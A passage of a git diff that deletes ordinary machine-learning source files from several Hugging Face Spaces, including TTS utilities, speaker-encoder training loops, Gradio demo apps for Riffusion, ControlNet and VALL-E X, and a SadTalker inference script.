"CodecOptions": - """Make a copy of this CodecOptions, overriding some options:: - - >>> from bson.codec_options import DEFAULT_CODEC_OPTIONS - >>> DEFAULT_CODEC_OPTIONS.tz_aware - False - >>> options = DEFAULT_CODEC_OPTIONS.with_options(tz_aware=True) - >>> options.tz_aware - True - - .. versionadded:: 3.5 - """ - opts = self._options_dict() - opts.update(kwargs) - return CodecOptions(**opts) - - -DEFAULT_CODEC_OPTIONS: "CodecOptions[Dict[str, Any]]" = CodecOptions() - - -def _parse_codec_options(options: Any) -> CodecOptions: - """Parse BSON codec options.""" - kwargs = {} - for k in set(options) & { - "document_class", - "tz_aware", - "uuidrepresentation", - "unicode_decode_error_handler", - "tzinfo", - "type_registry", - "datetime_conversion", - }: - if k == "uuidrepresentation": - kwargs["uuid_representation"] = options[k] - else: - kwargs[k] = options[k] - return CodecOptions(**kwargs) diff --git a/spaces/joushe/moe-tts/utils.py b/spaces/joushe/moe-tts/utils.py deleted file mode 100644 index 4cb5b43d0ca2bae496e7871b2094f2ffb26ab642..0000000000000000000000000000000000000000 --- a/spaces/joushe/moe-tts/utils.py +++ /dev/null @@ -1,226 +0,0 @@ -import os -import glob -import sys -import argparse -import logging -import json -import subprocess -import numpy as np -from scipy.io.wavfile import read -import torch - -MATPLOTLIB_FLAG = False - -logging.basicConfig(stream=sys.stdout, level=logging.ERROR) -logger = logging - - -def load_checkpoint(checkpoint_path, model, optimizer=None): - assert os.path.isfile(checkpoint_path) - checkpoint_dict = torch.load(checkpoint_path, map_location='cpu') - iteration = checkpoint_dict['iteration'] - learning_rate = checkpoint_dict['learning_rate'] - if optimizer is not None: - optimizer.load_state_dict(checkpoint_dict['optimizer']) - saved_state_dict = checkpoint_dict['model'] - if hasattr(model, 'module'): - state_dict = model.module.state_dict() - else: - state_dict = model.state_dict() - new_state_dict = {} - for k, v in state_dict.items(): - try: - new_state_dict[k] = saved_state_dict[k] - except: - logger.info("%s is not in the checkpoint" % k) - new_state_dict[k] = v - if hasattr(model, 'module'): - model.module.load_state_dict(new_state_dict) - else: - model.load_state_dict(new_state_dict) - logger.info("Loaded checkpoint '{}' (iteration {})".format( - checkpoint_path, iteration)) - return model, optimizer, learning_rate, iteration - - -def plot_spectrogram_to_numpy(spectrogram): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(10, 2)) - im = ax.imshow(spectrogram, aspect="auto", origin="lower", - interpolation='none') - plt.colorbar(im, ax=ax) - plt.xlabel("Frames") - plt.ylabel("Channels") - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def plot_alignment_to_numpy(alignment, info=None): - global MATPLOTLIB_FLAG - if not MATPLOTLIB_FLAG: - import matplotlib - matplotlib.use("Agg") - MATPLOTLIB_FLAG = True - mpl_logger = logging.getLogger('matplotlib') - mpl_logger.setLevel(logging.WARNING) - import matplotlib.pylab as plt - import numpy as np - - fig, ax = plt.subplots(figsize=(6, 4)) - im = ax.imshow(alignment.transpose(), aspect='auto', origin='lower', - interpolation='none') - fig.colorbar(im, ax=ax) - xlabel = 'Decoder timestep' - if info is not None: - xlabel += '\n\n' + info - plt.xlabel(xlabel) - plt.ylabel('Encoder timestep') - plt.tight_layout() - - fig.canvas.draw() - data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='') - data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,)) - plt.close() - return data - - -def load_wav_to_torch(full_path): - sampling_rate, data = read(full_path) - return torch.FloatTensor(data.astype(np.float32)), sampling_rate - - -def load_filepaths_and_text(filename, split="|"): - with open(filename, encoding='utf-8') as f: - filepaths_and_text = [line.strip().split(split) for line in f] - return filepaths_and_text - - -def get_hparams(init=True): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', type=str, default="./configs/base.json", - help='JSON file for configuration') - parser.add_argument('-m', '--model', type=str, required=True, - help='Model name') - - args = parser.parse_args() - model_dir = os.path.join("./logs", args.model) - - if not os.path.exists(model_dir): - os.makedirs(model_dir) - - config_path = args.config - config_save_path = os.path.join(model_dir, "config.json") - if init: - with open(config_path, "r") as f: - data = f.read() - with open(config_save_path, "w") as f: - f.write(data) - else: - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_dir(model_dir): - config_save_path = os.path.join(model_dir, "config.json") - with open(config_save_path, "r") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - hparams.model_dir = model_dir - return hparams - - -def get_hparams_from_file(config_path): - with open(config_path, "r", encoding="utf-8") as f: - data = f.read() - config = json.loads(data) - - hparams = HParams(**config) - return hparams - - -def check_git_hash(model_dir): - source_dir = os.path.dirname(os.path.realpath(__file__)) - if not os.path.exists(os.path.join(source_dir, ".git")): - logger.warn("{} is not a git repository, therefore hash value comparison will be ignored.".format( - source_dir - )) - return - - cur_hash = subprocess.getoutput("git rev-parse HEAD") - - path = os.path.join(model_dir, "githash") - if os.path.exists(path): - saved_hash = open(path).read() - if saved_hash != cur_hash: - logger.warn("git hash values are different. {}(saved) != {}(current)".format( - saved_hash[:8], cur_hash[:8])) - else: - open(path, "w").write(cur_hash) - - -def get_logger(model_dir, filename="train.log"): - global logger - logger = logging.getLogger(os.path.basename(model_dir)) - logger.setLevel(logging.DEBUG) - - formatter = logging.Formatter("%(asctime)s\t%(name)s\t%(levelname)s\t%(message)s") - if not os.path.exists(model_dir): - os.makedirs(model_dir) - h = logging.FileHandler(os.path.join(model_dir, filename)) - h.setLevel(logging.DEBUG) - h.setFormatter(formatter) - logger.addHandler(h) - return logger - - -class HParams(): - def __init__(self, **kwargs): - for k, v in kwargs.items(): - if type(v) == dict: - v = HParams(**v) - self[k] = v - - def keys(self): - return self.__dict__.keys() - - def items(self): - return self.__dict__.items() - - def values(self): - return self.__dict__.values() - - def __len__(self): - return len(self.__dict__) - - def __getitem__(self, key): - return getattr(self, key) - - def __setitem__(self, key, value): - return setattr(self, key, value) - - def __contains__(self, key): - return key in self.__dict__ - - def __repr__(self): - return self.__dict__.__repr__() diff --git a/spaces/jroust/rooster/app.py b/spaces/jroust/rooster/app.py deleted file mode 100644 index ce9ff2a34eb063ea41406e923a6d6ebcdc1efa6d..0000000000000000000000000000000000000000 --- a/spaces/jroust/rooster/app.py +++ /dev/null @@ -1,4 +0,0 @@ -import gradio as gr -name_list = ['spaces/onnx/GPT-2'] -interfaces = [gr.Interface.load(name) for name in name_list] -gr.mix.Parallel(*interfaces, title="cockadoodledo", description="funtimes").launch() \ No newline at end of file diff --git a/spaces/jsxyhelu/skyseg/utils/dice_score.py b/spaces/jsxyhelu/skyseg/utils/dice_score.py deleted file mode 100644 index c07f0d0fbef5fb1552a4cf2a52e5bf7cef1477d4..0000000000000000000000000000000000000000 --- a/spaces/jsxyhelu/skyseg/utils/dice_score.py +++ /dev/null @@ -1,40 +0,0 @@ -import torch -from torch import Tensor - - -def dice_coeff(input: Tensor, target: Tensor, reduce_batch_first: bool = False, epsilon=1e-6): - # Average of Dice coefficient for all batches, or for a single mask - assert input.size() == target.size() - if input.dim() == 2 and reduce_batch_first: - raise ValueError(f'Dice: asked to reduce batch but got tensor without batch dimension (shape {input.shape})') - - if input.dim() == 2 or reduce_batch_first: - inter = torch.dot(input.reshape(-1), target.reshape(-1)) - sets_sum = torch.sum(input) + torch.sum(target) - if sets_sum.item() == 0: - sets_sum = 2 * inter - - return (2 * inter + epsilon) / (sets_sum + epsilon) - else: - # compute and average metric for each batch element - dice = 0 - for i in range(input.shape[0]): - dice += dice_coeff(input[i, ...], target[i, ...]) - return dice / input.shape[0] - - -def multiclass_dice_coeff(input: Tensor, target: Tensor, reduce_batch_first: bool = False, epsilon=1e-6): - # Average of Dice coefficient for all classes - assert input.size() == target.size() - dice = 0 - for channel in range(input.shape[1]): - dice += dice_coeff(input[:, channel, ...], target[:, channel, ...], reduce_batch_first, epsilon) - - return dice / input.shape[1] - - -def dice_loss(input: Tensor, target: Tensor, multiclass: bool = False): - # Dice loss (objective to minimize) between 0 and 1 - assert input.size() == target.size() - fn = multiclass_dice_coeff if multiclass else dice_coeff - return 1 - fn(input, target, reduce_batch_first=True) diff --git a/spaces/jx-yang/deep-thinking/tasks/base.py b/spaces/jx-yang/deep-thinking/tasks/base.py deleted file mode 100644 index e0b00fc6d22816ad9c6fbc7fd2d6b1b97913d12f..0000000000000000000000000000000000000000 --- a/spaces/jx-yang/deep-thinking/tasks/base.py +++ /dev/null @@ -1,58 +0,0 @@ -import numpy as np - - -class BaseProbInference: - def __init__(self, prompt_version): - if prompt_version == "default": - self.prompt_version = self.default_prompt_version() - else: - self.prompt_version = prompt_version - - self.raw_data_result = None - self.raw_data_sample = None - self.raw_data_dev = None - - self.can_be_stratified = False - self.CHOICES = None - self.num_base_shot = 1 - - def default_prompt_version(self): - raise NotImplementedError - - def dataset_signature(self): - # { - # "result": (dataset_name, subset, split), # which produce the final result - # "sample": (dataset_name, subset, split), # which we sample ICL few-shot examples - # } - raise NotImplementedError - - def dataset_part(self, part): - return self.dataset_signature()[part] - - def dataset_preprocess(self, raw_data): - raise NotImplementedError - - def handcrafted_exemplars(self): - raise NotImplementedError - - def exemplar_seperator(self): - raise NotImplementedError - - def multiple_choice_promptify(self, query, choice): - raise NotImplementedError - - @staticmethod - def merge_choice_info(choice_info): - merged = {} - for k in ["lm_log_p", "norm_lm_log_p"]: - one_metric_merged = [] - for info in choice_info: - one_metric_merged.append(info[k]) - merged[k] = one_metric_merged - return merged - - @staticmethod - def choice_info_to_predictions(info): - lm_log_p_idx = int(np.argmax(info["lm_log_p"])) - norm_lm_log_p_idx = int(np.argmax(info["norm_lm_log_p"])) - return {"lm_log_p": lm_log_p_idx, "norm_lm_log_p": norm_lm_log_p_idx} diff --git a/spaces/kcagle/AutoGPT/run_continuous.bat b/spaces/kcagle/AutoGPT/run_continuous.bat deleted file mode 100644 index 812aa01c1c5506c452665610c0e9e83a17c426f2..0000000000000000000000000000000000000000 --- a/spaces/kcagle/AutoGPT/run_continuous.bat +++ /dev/null @@ -1,3 +0,0 @@ -@echo off -set argument=--continuous -call run.bat %argument% diff --git a/spaces/keithhon/Real-Time-Voice-Cloning/encoder/train.py b/spaces/keithhon/Real-Time-Voice-Cloning/encoder/train.py deleted file mode 100644 index 619952e8de6c390912fe341403a39169592e585d..0000000000000000000000000000000000000000 --- a/spaces/keithhon/Real-Time-Voice-Cloning/encoder/train.py +++ /dev/null @@ -1,123 +0,0 @@ -from encoder.visualizations import Visualizations -from encoder.data_objects import SpeakerVerificationDataLoader, SpeakerVerificationDataset -from encoder.params_model import * -from encoder.model import SpeakerEncoder -from utils.profiler import Profiler -from pathlib import Path -import torch - -def sync(device: torch.device): - # For correct profiling (cuda operations are async) - if device.type == "cuda": - torch.cuda.synchronize(device) - - -def train(run_id: str, clean_data_root: Path, models_dir: Path, umap_every: int, save_every: int, - backup_every: int, vis_every: int, force_restart: bool, visdom_server: str, - no_visdom: bool): - # Create a dataset and a dataloader - dataset = SpeakerVerificationDataset(clean_data_root) - loader = SpeakerVerificationDataLoader( - dataset, - speakers_per_batch, - utterances_per_speaker, - num_workers=8, - ) - - # Setup the device on which to run the forward pass and the loss. These can be different, - # because the forward pass is faster on the GPU whereas the loss is often (depending on your - # hyperparameters) faster on the CPU. - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - # FIXME: currently, the gradient is None if loss_device is cuda - loss_device = torch.device("cpu") - - # Create the model and the optimizer - model = SpeakerEncoder(device, loss_device) - optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate_init) - init_step = 1 - - # Configure file path for the model - state_fpath = models_dir.joinpath(run_id + ".pt") - backup_dir = models_dir.joinpath(run_id + "_backups") - - # Load any existing model - if not force_restart: - if state_fpath.exists(): - print("Found existing model \"%s\", loading it and resuming training." % run_id) - checkpoint = torch.load(state_fpath) - init_step = checkpoint["step"] - model.load_state_dict(checkpoint["model_state"]) - optimizer.load_state_dict(checkpoint["optimizer_state"]) - optimizer.param_groups[0]["lr"] = learning_rate_init - else: - print("No model \"%s\" found, starting training from scratch." % run_id) - else: - print("Starting the training from scratch.") - model.train() - - # Initialize the visualization environment - vis = Visualizations(run_id, vis_every, server=visdom_server, disabled=no_visdom) - vis.log_dataset(dataset) - vis.log_params() - device_name = str(torch.cuda.get_device_name(0) if torch.cuda.is_available() else "CPU") - vis.log_implementation({"Device": device_name}) - - # Training loop - profiler = Profiler(summarize_every=10, disabled=False) - for step, speaker_batch in enumerate(loader, init_step): - profiler.tick("Blocking, waiting for batch (threaded)") - - # Forward pass - inputs = torch.from_numpy(speaker_batch.data).to(device) - sync(device) - profiler.tick("Data to %s" % device) - embeds = model(inputs) - sync(device) - profiler.tick("Forward pass") - embeds_loss = embeds.view((speakers_per_batch, utterances_per_speaker, -1)).to(loss_device) - loss, eer = model.loss(embeds_loss) - sync(loss_device) - profiler.tick("Loss") - - # Backward pass - model.zero_grad() - loss.backward() - profiler.tick("Backward pass") - model.do_gradient_ops() - optimizer.step() - profiler.tick("Parameter update") - - # Update visualizations - # learning_rate = optimizer.param_groups[0]["lr"] - vis.update(loss.item(), eer, step) - - # Draw projections and save them to the backup folder - if umap_every != 0 and step % umap_every == 0: - print("Drawing and saving projections (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - projection_fpath = backup_dir.joinpath("%s_umap_%06d.png" % (run_id, step)) - embeds = embeds.detach().cpu().numpy() - vis.draw_projections(embeds, utterances_per_speaker, step, projection_fpath) - vis.save() - - # Overwrite the latest version of the model - if save_every != 0 and step % save_every == 0: - print("Saving the model (step %d)" % step) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, state_fpath) - - # Make a backup - if backup_every != 0 and step % backup_every == 0: - print("Making a backup (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - backup_fpath = backup_dir.joinpath("%s_bak_%06d.pt" % (run_id, step)) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, backup_fpath) - - profiler.tick("Extras (visualizations, saving)") diff --git a/spaces/keras-dreambooth/keras-dreambooth-riffusion-currulao/app.py b/spaces/keras-dreambooth/keras-dreambooth-riffusion-currulao/app.py deleted file mode 100644 index 436641e8de2d8a359cf581496c05b647cf0043aa..0000000000000000000000000000000000000000 --- a/spaces/keras-dreambooth/keras-dreambooth-riffusion-currulao/app.py +++ /dev/null @@ -1,57 +0,0 @@ -import torch -print(f"Torch version: {torch.version.cuda}") - -from stable_diffusion_tf.stable_diffusion import StableDiffusion as StableDiffusionPy -import gradio as gr -from tensorflow import keras -from PIL import Image - -from spectro import wav_bytes_from_spectrogram_image - -keras.mixed_precision.set_global_policy("mixed_float16") #float32 -# load keras model -resolution=512 -sd_dreambooth_model_1=StableDiffusionPy(resolution, resolution, download_weights=False, jit_compile=True) - -sd_dreambooth_model_1.load_weights_from_pytorch_ckpt("riffusion-model-v1.ckpt") - -sd_dreambooth_model_1.diffusion_model.load_weights("dreambooth_riffusion_model_currulao_v1/") - - -def generate_images(prompt: str, num_steps: int, unconditional_guidance_scale: int, temperature: int): - img = sd_dreambooth_model_1.generate( - prompt, - num_steps=num_steps, - unconditional_guidance_scale=unconditional_guidance_scale, - temperature=temperature, - batch_size=1, - ) - - pil_img = Image.fromarray(img[0]) - pil_img.save("img.png") - wav = wav_bytes_from_spectrogram_image(pil_img) - with open("output.wav", "wb") as f: - f.write(wav[0].getbuffer()) - final_video = gr.make_waveform("output.wav", bg_image="img.png") - return final_video - - -# pass function, input type for prompt, the output for multiple images -gr.Interface( - title="Keras Dreambooth Riffusion-Currulao", - description="""This SD model has been fine-tuned from Riffusion to generate spectrograms of [Currulao](https://en.wikipedia.org/wiki/Music_of_Colombia#Currulao) music. Currulao is a traditional Afro-Colombian music and dance genre, characterized by its rhythmic beats, call-and-response singing, and lively percussion instruments, that holds significant cultural and social importance in Colombia, particularly in the Pacific coast region, as a celebration of African heritage and community identity. - To generate the concept, use the phrase 'a $currulao song' in your prompt. - """, - fn=generate_images, - inputs=[ - gr.Textbox(label="Prompt", value="a $currulao song, lo-fi"), - gr.Slider(label="Inference steps", value=50), - gr.Slider(label="Guidance scale", value=7.5, maximum=15, minimum=0, step=0.5), - gr.Slider(label='Temperature', value=1, maximum=1.5, minimum=0, step=0.1), - ], - outputs=[ - gr.Video(), - ], - examples=[["a $currulao song", 50, 7.5, 1], - ["a $currulao song, lo-fi, nostalgic", 100, 9.5, 0.7]], - ).queue().launch(debug=True) \ No newline at end of file diff --git a/spaces/kevinwang676/ChatGLM2-SadTalker/speaker_encoder/train.py b/spaces/kevinwang676/ChatGLM2-SadTalker/speaker_encoder/train.py deleted file mode 100644 index 2e9485afbeead6a063b5ef69a85f05757d6c91ff..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/ChatGLM2-SadTalker/speaker_encoder/train.py +++ /dev/null @@ -1,125 +0,0 @@ -from speaker_encoder.visualizations import Visualizations -from speaker_encoder.data_objects import SpeakerVerificationDataLoader, SpeakerVerificationDataset -from speaker_encoder.params_model import * -from speaker_encoder.model import SpeakerEncoder -from utils.profiler import Profiler -from pathlib import Path -import torch - -def sync(device: torch.device): - # FIXME - return - # For correct profiling (cuda operations are async) - if device.type == "cuda": - torch.cuda.synchronize(device) - -def train(run_id: str, clean_data_root: Path, models_dir: Path, umap_every: int, save_every: int, - backup_every: int, vis_every: int, force_restart: bool, visdom_server: str, - no_visdom: bool): - # Create a dataset and a dataloader - dataset = SpeakerVerificationDataset(clean_data_root) - loader = SpeakerVerificationDataLoader( - dataset, - speakers_per_batch, # 64 - utterances_per_speaker, # 10 - num_workers=8, - ) - - # Setup the device on which to run the forward pass and the loss. These can be different, - # because the forward pass is faster on the GPU whereas the loss is often (depending on your - # hyperparameters) faster on the CPU. - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - # FIXME: currently, the gradient is None if loss_device is cuda - loss_device = torch.device("cpu") - - # Create the model and the optimizer - model = SpeakerEncoder(device, loss_device) - optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate_init) - init_step = 1 - - # Configure file path for the model - state_fpath = models_dir.joinpath(run_id + ".pt") - backup_dir = models_dir.joinpath(run_id + "_backups") - - # Load any existing model - if not force_restart: - if state_fpath.exists(): - print("Found existing model \"%s\", loading it and resuming training." % run_id) - checkpoint = torch.load(state_fpath) - init_step = checkpoint["step"] - model.load_state_dict(checkpoint["model_state"]) - optimizer.load_state_dict(checkpoint["optimizer_state"]) - optimizer.param_groups[0]["lr"] = learning_rate_init - else: - print("No model \"%s\" found, starting training from scratch." % run_id) - else: - print("Starting the training from scratch.") - model.train() - - # Initialize the visualization environment - vis = Visualizations(run_id, vis_every, server=visdom_server, disabled=no_visdom) - vis.log_dataset(dataset) - vis.log_params() - device_name = str(torch.cuda.get_device_name(0) if torch.cuda.is_available() else "CPU") - vis.log_implementation({"Device": device_name}) - - # Training loop - profiler = Profiler(summarize_every=10, disabled=False) - for step, speaker_batch in enumerate(loader, init_step): - profiler.tick("Blocking, waiting for batch (threaded)") - - # Forward pass - inputs = torch.from_numpy(speaker_batch.data).to(device) - sync(device) - profiler.tick("Data to %s" % device) - embeds = model(inputs) - sync(device) - profiler.tick("Forward pass") - embeds_loss = embeds.view((speakers_per_batch, utterances_per_speaker, -1)).to(loss_device) - loss, eer = model.loss(embeds_loss) - sync(loss_device) - profiler.tick("Loss") - - # Backward pass - model.zero_grad() - loss.backward() - profiler.tick("Backward pass") - model.do_gradient_ops() - optimizer.step() - profiler.tick("Parameter update") - - # Update visualizations - # learning_rate = optimizer.param_groups[0]["lr"] - vis.update(loss.item(), eer, step) - - # Draw projections and save them to the backup folder - if umap_every != 0 and step % umap_every == 0: - print("Drawing and saving projections (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - projection_fpath = backup_dir.joinpath("%s_umap_%06d.png" % (run_id, step)) - embeds = embeds.detach().cpu().numpy() - vis.draw_projections(embeds, utterances_per_speaker, step, projection_fpath) - vis.save() - - # Overwrite the latest version of the model - if save_every != 0 and step % save_every == 0: - print("Saving the model (step %d)" % step) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, state_fpath) - - # Make a backup - if backup_every != 0 and step % backup_every == 0: - print("Making a backup (step %d)" % step) - backup_dir.mkdir(exist_ok=True) - backup_fpath = backup_dir.joinpath("%s_bak_%06d.pt" % (run_id, step)) - torch.save({ - "step": step + 1, - "model_state": model.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, backup_fpath) - - profiler.tick("Extras (visualizations, saving)") - diff --git a/spaces/kevinwang676/ControlNet-with-GPT-4/app_mlsd.py b/spaces/kevinwang676/ControlNet-with-GPT-4/app_mlsd.py deleted file mode 100644 index c23738dce545e356921b996a192b98cfc81de0dd..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/ControlNet-with-GPT-4/app_mlsd.py +++ /dev/null @@ -1,99 +0,0 @@ -#!/usr/bin/env python - -import gradio as gr - -from settings import ( - DEFAULT_IMAGE_RESOLUTION, - DEFAULT_NUM_IMAGES, - MAX_IMAGE_RESOLUTION, - MAX_NUM_IMAGES, - MAX_SEED, -) -from utils import randomize_seed_fn - - -def create_demo(process): - with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - image = gr.Image() - prompt = gr.Textbox(label="Prompt") - run_button = gr.Button("Run") - with gr.Accordion("Advanced options", open=False): - num_samples = gr.Slider( - label="Number of images", minimum=1, maximum=MAX_NUM_IMAGES, value=DEFAULT_NUM_IMAGES, step=1 - ) - image_resolution = gr.Slider( - label="Image resolution", - minimum=256, - maximum=MAX_IMAGE_RESOLUTION, - value=DEFAULT_IMAGE_RESOLUTION, - step=256, - ) - preprocess_resolution = gr.Slider( - label="Preprocess resolution", minimum=128, maximum=512, value=512, step=1 - ) - mlsd_value_threshold = gr.Slider( - label="Hough value threshold (MLSD)", minimum=0.01, maximum=2.0, value=0.1, step=0.01 - ) - mlsd_distance_threshold = gr.Slider( - label="Hough distance threshold (MLSD)", minimum=0.01, maximum=20.0, value=0.1, step=0.01 - ) - num_steps = gr.Slider(label="Number of steps", minimum=1, maximum=100, value=20, step=1) - guidance_scale = gr.Slider(label="Guidance scale", minimum=0.1, maximum=30.0, value=9.0, step=0.1) - seed = gr.Slider(label="Seed", minimum=0, maximum=MAX_SEED, step=1, value=0) - randomize_seed = gr.Checkbox(label="Randomize seed", value=True) - a_prompt = gr.Textbox(label="Additional prompt", value="best quality, extremely detailed") - n_prompt = gr.Textbox( - label="Negative prompt", - value="longbody, lowres, bad anatomy, bad hands, missing fingers, extra digit, fewer digits, cropped, worst quality, low quality", - ) - with gr.Column(): - result = gr.Gallery(label="Output", show_label=False, columns=2, object_fit="scale-down") - inputs = [ - image, - prompt, - a_prompt, - n_prompt, - num_samples, - image_resolution, - preprocess_resolution, - num_steps, - guidance_scale, - seed, - mlsd_value_threshold, - mlsd_distance_threshold, - ] - prompt.submit( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - api_name=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - api_name=False, - ) - run_button.click( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - api_name=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - api_name="mlsd", - ) - return demo - - -if __name__ == "__main__": - from model import Model - - model = Model(task_name="MLSD") - demo = create_demo(model.process_mlsd) - demo.queue().launch() diff --git a/spaces/kevinwang676/VALLE/descriptions.py b/spaces/kevinwang676/VALLE/descriptions.py deleted file mode 100644 index cd75197dff19f1bb8dc4e9b6d1ea89ac44e4dd55..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/VALLE/descriptions.py +++ /dev/null @@ -1,27 +0,0 @@ -top_md = """ -# VALL-E X -[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1yyD_sz531QntLKowMHo-XxorsFBCfKul?usp=sharing) -VALL-E X can synthesize high-quality personalized speech with only a 3-second enrolled recording of -an unseen speaker as an acoustic prompt, even in another language for a monolingual speaker.
    -This implementation supports zero-shot, mono-lingual/cross-lingual text-to-speech functionality of three languages (English, Chinese, Japanese)
    -See this [demo](https://plachtaa.github.io/) page for more details. -""" - -infer_from_audio_md = """ -Upload a speech of 3~10 seconds as the audio prompt and type in the text you'd like to synthesize.
    -The model will synthesize speech of given text with the same voice of your audio prompt.
    -The model also tends to preserve the emotion & acoustic environment of your given speech.
    -For faster inference, please use **"Make prompt"** to get a `.npz` file as the encoded audio prompt, and use it by **"Infer from prompt"** -""" - -make_prompt_md = """ -Upload a speech of 3~10 seconds as the audio prompt.
    -Get a `.npz` file as the encoded audio prompt. Use it by **"Infer with prompt"** -""" - -infer_from_prompt_md = """ -Faster than **"Infer from audio"**.
    -You need to **"Make prompt"** first, and upload the encoded prompt (a `.npz` file) -""" - -long_text_example = "Just a few years ago, there were no legions of deep learning scientists developing intelligent products and services at major companies and startups. When we entered the field, machine learning did not command headlines in daily newspapers. Our parents had no idea what machine learning was, let alone why we might prefer it to a career in medicine or law. Machine learning was a blue skies academic discipline whose industrial significance was limited to a narrow set of real-world applications, including speech recognition and computer vision. Moreover, many of these applications required so much domain knowledge that they were often regarded as entirely separate areas for which machine learning was one small component. At that time, neural networks—the predecessors of the deep learning methods that we focus on in this book—were generally regarded as outmoded." \ No newline at end of file diff --git a/spaces/kevinwang676/VoiceChanger/inference.py b/spaces/kevinwang676/VoiceChanger/inference.py deleted file mode 100644 index a0b007901c9848ef8b3409607a4a73cc5a3a5ab9..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/VoiceChanger/inference.py +++ /dev/null @@ -1,145 +0,0 @@ -from glob import glob -import shutil -import torch -from time import strftime -import os, sys, time -from argparse import ArgumentParser - -from src.utils.preprocess import CropAndExtract -from src.test_audio2coeff import Audio2Coeff -from src.facerender.animate import AnimateFromCoeff -from src.generate_batch import get_data -from src.generate_facerender_batch import get_facerender_data -from src.utils.init_path import init_path - -def main(args): - #torch.backends.cudnn.enabled = False - - pic_path = args.source_image - audio_path = args.driven_audio - save_dir = os.path.join(args.result_dir, strftime("%Y_%m_%d_%H.%M.%S")) - os.makedirs(save_dir, exist_ok=True) - pose_style = args.pose_style - device = args.device - batch_size = args.batch_size - input_yaw_list = args.input_yaw - input_pitch_list = args.input_pitch - input_roll_list = args.input_roll - ref_eyeblink = args.ref_eyeblink - ref_pose = args.ref_pose - - current_root_path = os.path.split(sys.argv[0])[0] - - sadtalker_paths = init_path(args.checkpoint_dir, os.path.join(current_root_path, 'src/config'), args.size, args.old_version, args.preprocess) - - #init model - preprocess_model = CropAndExtract(sadtalker_paths, device) - - audio_to_coeff = Audio2Coeff(sadtalker_paths, device) - - animate_from_coeff = AnimateFromCoeff(sadtalker_paths, device) - - #crop image and extract 3dmm from image - first_frame_dir = os.path.join(save_dir, 'first_frame_dir') - os.makedirs(first_frame_dir, exist_ok=True) - print('3DMM Extraction for source image') - first_coeff_path, crop_pic_path, crop_info = preprocess_model.generate(pic_path, first_frame_dir, args.preprocess,\ - source_image_flag=True, pic_size=args.size) - if first_coeff_path is None: - print("Can't get the coeffs of the input") - return - - if ref_eyeblink is not None: - ref_eyeblink_videoname = os.path.splitext(os.path.split(ref_eyeblink)[-1])[0] - ref_eyeblink_frame_dir = os.path.join(save_dir, ref_eyeblink_videoname) - os.makedirs(ref_eyeblink_frame_dir, exist_ok=True) - print('3DMM Extraction for the reference video providing eye blinking') - ref_eyeblink_coeff_path, _, _ = preprocess_model.generate(ref_eyeblink, ref_eyeblink_frame_dir, args.preprocess, source_image_flag=False) - else: - ref_eyeblink_coeff_path=None - - if ref_pose is not None: - if ref_pose == ref_eyeblink: - ref_pose_coeff_path = ref_eyeblink_coeff_path - else: - ref_pose_videoname = os.path.splitext(os.path.split(ref_pose)[-1])[0] - ref_pose_frame_dir = os.path.join(save_dir, ref_pose_videoname) - os.makedirs(ref_pose_frame_dir, exist_ok=True) - print('3DMM Extraction for the reference video providing pose') - ref_pose_coeff_path, _, _ = preprocess_model.generate(ref_pose, ref_pose_frame_dir, args.preprocess, source_image_flag=False) - else: - ref_pose_coeff_path=None - - #audio2ceoff - batch = get_data(first_coeff_path, audio_path, device, ref_eyeblink_coeff_path, still=args.still) - coeff_path = audio_to_coeff.generate(batch, save_dir, pose_style, ref_pose_coeff_path) - - # 3dface render - if args.face3dvis: - from src.face3d.visualize import gen_composed_video - gen_composed_video(args, device, first_coeff_path, coeff_path, audio_path, os.path.join(save_dir, '3dface.mp4')) - - #coeff2video - data = get_facerender_data(coeff_path, crop_pic_path, first_coeff_path, audio_path, - batch_size, input_yaw_list, input_pitch_list, input_roll_list, - expression_scale=args.expression_scale, still_mode=args.still, preprocess=args.preprocess, size=args.size) - - result = animate_from_coeff.generate(data, save_dir, pic_path, crop_info, \ - enhancer=args.enhancer, background_enhancer=args.background_enhancer, preprocess=args.preprocess, img_size=args.size) - - shutil.move(result, save_dir+'.mp4') - print('The generated video is named:', save_dir+'.mp4') - - if not args.verbose: - shutil.rmtree(save_dir) - - -if __name__ == '__main__': - - parser = ArgumentParser() - parser.add_argument("--driven_audio", default='./examples/driven_audio/bus_chinese.wav', help="path to driven audio") - parser.add_argument("--source_image", 